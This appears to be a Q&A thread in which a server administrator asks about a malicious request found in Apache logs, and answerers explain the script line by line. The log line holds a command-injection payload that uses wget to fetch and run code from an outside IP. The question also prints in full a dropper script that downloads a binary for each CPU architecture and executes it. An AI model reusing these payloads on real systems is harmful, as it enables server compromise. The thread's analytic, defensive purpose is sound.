33

I've been noticing on my servers apache logs, the following strange lines lately:

156.222.222.13 - - [08/Sep/2018:04:27:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.173.159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0"

So I made a custom Fail2Ban filter and started banning the IPs requesting these /login.cgi URLs.

But I was curious as to what they were trying to do, so I pulled the script they're trying to execute and I can't seem to figure out what exactly it does. Something about removing arch folders in /var and /tmp?

Anyway, here it is: 

#!/bin/sh
u="asgknskjdgn"
bin_names="mmips mipsel arm arm7 powerpc x86_64 x86_32"
http_server="80.211.173.159"
http_port=80
cd /tmp/||cd /var/
for name in $bin_names
    do
    rm -rf $u
    cp $SHELL $u
    chmod 777 $u
    >$u
    wget http://$http_server:$http_port/$name -O -> $u
    ./$u $name
done
RonJohn
  • 403
ndom91
  • 443

2 Answers2

44

Line by line:

#!/bin/sh

Establishes the sh shell, whichever that is, as the shebang line. sh%20/tmp/ks in the request overrides this, so this line is treated as a normal comment and ignored.

u="asgknskjdgn"

Declares an arbitrary name, presumably to avoid colliding with other filenames. I'm not sure why they wouldn't just use mktemp, but maybe that is not available on all platforms.

bin_names="mmips mipsel arm arm7 powerpc x86_64 x86_32"

Enumerates several common CPU architectures.

http_server="80.211.173.159"
http_port=80

The server which has the exploit.

cd /tmp/||cd /var/

Tries to change directory to somewhere your web server is likely to be able to create files. I believe SELinux will help with this, by enforcing much stricter rules about what the web server can do than the file system does on its own.

for name in $bin_names
    do

For each CPU architecture…

    rm -rf $u

Removes previously tried exploit programs. Unnecessary because of the next line, so can be ignored.

    cp $SHELL $u

Copies the current shell executable (/bin/sh). Can be ignored because of the line after next.

    chmod 777 $u

Makes everyone have full access to the new file. This should have been after the wget command, which is either a sign of a shell scripting newbie or a misdirection technique.

    >$u

Empties out the file. Pointless because of the next line.

    wget http://$http_server:$http_port/$name -O -> $u

Overwrites the file with the exploit script for this architecture. -O -> $u could have been written -O - > $u (the hyphen indicates that the download should be written to standard output) which is equivalent to -O $u.

    ./$u $name

Runs the exploit script with the architecture as the first argument.

done

Ends the loop.

It looks like this is a trivial exploit attempt script, trying known exploits against various CPU platforms. I do not know why it overwrites $u three times, but those operations could simply be remains from an earlier iteration of the script. Presumably that earlier version had the exploits hard coded rather than dynamically served - the former is easier but almost guarantees that the script will be less effective over time as bugs are patched.

l0b0
  • 7,453
12

The wget is the key dangerous line.

The for name in $bin_names is working through the list of platforms and for each platform it is clearing a temporary directory, copying a shell over and then making it accessible by everyone.

It then downloads a file using wget and then executes it using the shell program it just copied over.

The script is basically attempting to download a series of executables or scripts for every platform it can and rubbing them against your system in the hope that it can further compromise your system.

Mokubai
  • 95,412